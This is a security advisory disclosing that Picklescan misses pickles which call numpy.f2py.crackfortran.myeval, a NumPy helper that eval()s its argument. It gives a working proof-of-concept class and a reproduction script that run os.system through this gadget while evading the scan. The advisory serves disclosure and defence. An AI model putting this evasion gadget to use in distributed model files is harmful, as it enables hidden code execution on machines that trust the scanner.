Headline
GHSA-3329-ghmp-jmv5: Picklescan is vulnerable to RCE through missing detection when calling numpy.f2py.crackfortran.myeval
Summary
Picklescan fails to flag pickle files that call numpy.f2py.crackfortran.myeval. This NumPy helper passes its argument straight to Python's eval(), so a pickle file that references it can execute arbitrary code when the file is loaded.
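The gadget works because of how myeval is implemented. The sketch below is a simplified paraphrase of the function as it appears in numpy/f2py/crackfortran.py (exact code may vary across NumPy versions): the expression string is evaluated unconditionally, and only the result type is checked afterwards, so any side effects have already occurred by the time the check runs.

def myeval(e, g=None, l=None):
    # Simplified paraphrase of numpy.f2py.crackfortran.myeval.
    # The attacker-controlled string is passed directly to eval();
    # os.system returns an int (the exit status), so the return-type
    # check below passes -- after the command has already executed.
    r = eval(e, g, l)
    if type(r) in [int, float]:
        return r
    raise ValueError('r=%r' % (r))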
Details
The attack payload executes in the following steps:
- First, the attacker crafts a pickle file whose __reduce__ method returns a call to numpy.f2py.crackfortran.myeval with an attacker-controlled expression string.
- Then, the victim checks the pickle file with the Picklescan library. Because the library does not flag myeval as a dangerous function, the scan comes back clean; trusting that result, the victim calls pickle.load() on the malicious file, unpickling invokes myeval, and the attacker's expression is eval()ed, leading to remote code execution.
PoC
class RCE:
    def __reduce__(self):
        # myeval is not on picklescan's blocklist, yet it eval()s its
        # argument; os.system returns an int, so myeval's return-type
        # check passes after the command has run.
        from numpy.f2py.crackfortran import myeval
        return (myeval, ("os.system('ls')",))
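For context, a minimal end-to-end reproduction might look like the following sketch, which reuses the RCE class from the PoC above. The file name payload.pkl is illustrative; the scan step shown in the comment uses the picklescan CLI as documented in its README.

import pickle

# Attacker side: serialize the gadget to a file.
with open("payload.pkl", "wb") as f:
    pickle.dump(RCE(), f)

# Victim side: a scan with a vulnerable picklescan release, e.g.
#   picklescan --path payload.pkl
# reports no dangerous globals, so the victim loads the file:
with open("payload.pkl", "rb") as f:
    pickle.load(f)  # runs os.system('ls') via myeval -> eval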
Impact
Any organization or individual relying on Picklescan to detect malicious pickle files inside PyTorch models is affected. An attacker can embed malicious code in a pickle file that remains undetected by the scanner but executes when the file is loaded, and can distribute such infected files through ML models, APIs, or saved Python objects.
Reported by
Pinji Chen (cpj24@mails.tsinghua.edu.cn) from the NISL lab (https://netsec.ccert.edu.cn/about) at Tsinghua University, Guanheng Liu (coolwind326@gmail.com).
References
- GHSA-3329-ghmp-jmv5
- mmaitre314/picklescan#53
- mmaitre314/picklescan@70c1c6c